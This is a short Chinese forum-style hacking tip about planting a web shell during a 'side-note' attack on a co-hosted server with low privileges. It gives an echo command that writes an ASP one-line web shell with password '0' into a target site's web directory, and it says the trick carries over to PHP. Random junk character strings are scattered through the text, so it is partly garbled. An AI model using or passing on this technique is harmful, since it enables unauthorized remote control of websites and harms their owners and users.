在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。/ K( X$ j9 J) O. H" S. k% I) [
9 p* S4 B9 A8 c& J) I命令格式
- C' b* ^* h, F2 w1 R' u0 A0 U) {+ V' t6 l- H: p$ o( W! s
Echo 语句 >目标站绝对目录
6 ~" f: S5 u7 v6 Q
, C) m- j9 ]- V% b, W$ y6 \1 h( D例如: + D, o& G- J9 M+ n, t2 N
: a$ S9 B, ~2 G7 n4 R5 z/ f
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp$ E6 _8 G( n6 I. R( h$ r
- p2 v$ D- d2 ?5 s% ~: y这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。$ H0 P N3 b+ K' o4 C! `
|